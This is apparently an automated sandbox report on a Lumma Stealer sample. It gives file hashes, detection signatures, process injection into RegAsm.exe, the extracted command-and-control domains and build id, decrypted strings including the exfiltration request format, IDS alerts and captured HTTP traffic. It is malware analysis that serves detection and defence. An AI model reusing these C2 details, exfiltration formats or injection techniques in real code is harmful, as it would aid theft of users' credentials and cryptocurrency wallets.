Edit tour

Windows Analysis Report
A6QFRW2WiY.exe

Overview

General Information

Sample name:	A6QFRW2WiY.exe renamed because original name is a hash value
Original sample name:	0cee1d66332dec523210f62e479284b9.exe
Analysis ID:	1527259
MD5:	0cee1d66332dec523210f62e479284b9
SHA1:	33f950916e13a6ec654c52160ee47e88c64a5724
SHA256:	0a6a258bfdb9b1947f2945b44e274ff3f06a7c5c733ff83c2a71c5f911fa9cc0
Tags:	exeLummaStealeruser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

A6QFRW2WiY.exe (PID: 6380 cmdline: "C:\Users\user\Desktop\A6QFRW2WiY.exe" MD5: 0CEE1D66332DEC523210F62E479284B9)

conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 6404 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["drawzhotdog.shop", "stogeneratmns.shop", "reinforcenh.shop", "fragnantbui.shop", "vozmeatillu.shop", "ghostreedmnu.shop", "gutterydhowi.shop", "offensivedzvju.shop"], "Build id": "H8NgCl--"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T22:10:17.132757+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49708	172.67.206.204	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T22:10:17.132757+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49708	172.67.206.204	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T22:10:13.773894+0200	2056156	1	Domain Observed Used for C2 Detected	192.168.2.5	50040	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T22:10:13.833186+0200	2056154	1	Domain Observed Used for C2 Detected	192.168.2.5	52968	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T22:10:13.799408+0200	2056162	1	Domain Observed Used for C2 Detected	192.168.2.5	62439	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T22:10:13.787877+0200	2056164	1	Domain Observed Used for C2 Detected	192.168.2.5	57900	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T22:10:13.810493+0200	2056160	1	Domain Observed Used for C2 Detected	192.168.2.5	56174	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T22:10:13.858841+0200	2056150	1	Domain Observed Used for C2 Detected	192.168.2.5	51454	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T22:10:13.848240+0200	2056152	1	Domain Observed Used for C2 Detected	192.168.2.5	64125	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T22:10:13.821066+0200	2056158	1	Domain Observed Used for C2 Detected	192.168.2.5	55453	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/badges	URL Reputation: Label: malware

Found malware configuration

Source: 3.2.RegAsm.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["drawzhotdog.shop", "stogeneratmns.shop", "reinforcenh.shop", "fragnantbui.shop", "vozmeatillu.shop", "ghostreedmnu.shop", "gutterydhowi.shop", "offensivedzvju.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for submitted file

Source: A6QFRW2WiY.exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: reinforcenh.shop
Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stogeneratmns.shop
Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fragnantbui.shop
Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: vozmeatillu.shop
Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: gutterydhowi.shop
Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.2099588601.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: H8NgCl--

Source: A6QFRW2WiY.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49708 version: TLS 1.2

Source: A6QFRW2WiY.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+24h]	3_2_0040F870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	3_2_0040F870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	3_2_0040F870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	3_2_0040F870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	3_2_0040F870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-1Ch]	3_2_0040E9C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	3_2_0041A040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+edx]	3_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00443010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	3_2_0040A0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	3_2_0040A0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], cl	3_2_00431167
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+0Ch]	3_2_00431167
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+0Ch]	3_2_00431167
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00431167
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+44h]	3_2_0041D1CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 54CA534Eh	3_2_004472C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	3_2_004153E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	3_2_004153E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_0043A3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_004313A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], al	3_2_004313A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	3_2_00443460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	3_2_0042D46E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	3_2_0041447C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	3_2_004474C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h	3_2_0042D4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_0042F530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000874h]	3_2_00428581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edx], ax	3_2_00428581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	3_2_00444590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	3_2_00445643
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	3_2_00405680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	3_2_00410690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	3_2_00410690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	3_2_00449700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	3_2_00449700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	3_2_004487D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp+14h], 12EEEC16h	3_2_0042E7F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	3_2_004278E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_004278E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	3_2_004278E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	3_2_00449890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	3_2_00449890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	3_2_00449A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+0Ch]	3_2_00431AC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+0Ch]	3_2_00431AC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000006A8h]	3_2_0041DACA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_0040DBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then xor eax, eax	3_2_0042ABF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	3_2_00443B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	3_2_00443B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	3_2_00414C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	3_2_00447D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	3_2_00440D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi+eax+01h], 00000000h	3_2_0042CD08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	3_2_0042CD08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	3_2_0042FD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], dx	3_2_0041FD80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp dword ptr [00450078h]	3_2_0041FD80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_00411DAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi]	3_2_00411DAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_00411DAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00425EF0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.5:55453 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.5:52968 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.5:57900 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.5:64125 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.5:50040 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.5:51454 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.5:56174 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.5:62439 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49708 -> 172.67.206.204:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 172.67.206.204:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: drawzhotdog.shop
Source: Malware configuration extractor	URLs: stogeneratmns.shop
Source: Malware configuration extractor	URLs: reinforcenh.shop
Source: Malware configuration extractor	URLs: fragnantbui.shop
Source: Malware configuration extractor	URLs: vozmeatillu.shop
Source: Malware configuration extractor	URLs: ghostreedmnu.shop
Source: Malware configuration extractor	URLs: gutterydhowi.shop
Source: Malware configuration extractor	URLs: offensivedzvju.shop

Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox View	IP Address: 172.67.206.204 172.67.206.204

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: global traffic	DNS traffic detected: DNS query: drawzhotdog.shop
Source: global traffic	DNS traffic detected: DNS query: gutterydhowi.shop
Source: global traffic	DNS traffic detected: DNS query: ghostreedmnu.shop
Source: global traffic	DNS traffic detected: DNS query: offensivedzvju.shop
Source: global traffic	DNS traffic detected: DNS query: vozmeatillu.shop
Source: global traffic	DNS traffic detected: DNS query: fragnantbui.shop
Source: global traffic	DNS traffic detected: DNS query: stogeneratmns.shop
Source: global traffic	DNS traffic detected: DNS query: reinforcenh.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: sergei-esenin.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com

Source: A6QFRW2WiY.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: A6QFRW2WiY.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: A6QFRW2WiY.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: A6QFRW2WiY.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: A6QFRW2WiY.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: A6QFRW2WiY.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: A6QFRW2WiY.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: A6QFRW2WiY.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: A6QFRW2WiY.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: A6QFRW2WiY.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: A6QFRW2WiY.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: A6QFRW2WiY.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2100205824.0000000001463000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2100205824.0000000001463000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2100205824.0000000001463000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: A6QFRW2WiY.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: A6QFRW2WiY.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: RegAsm.exe, 00000003.00000002.2099872540.0000000001456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2100205824.0000000001463000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000003.00000002.2099872540.00000000013CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
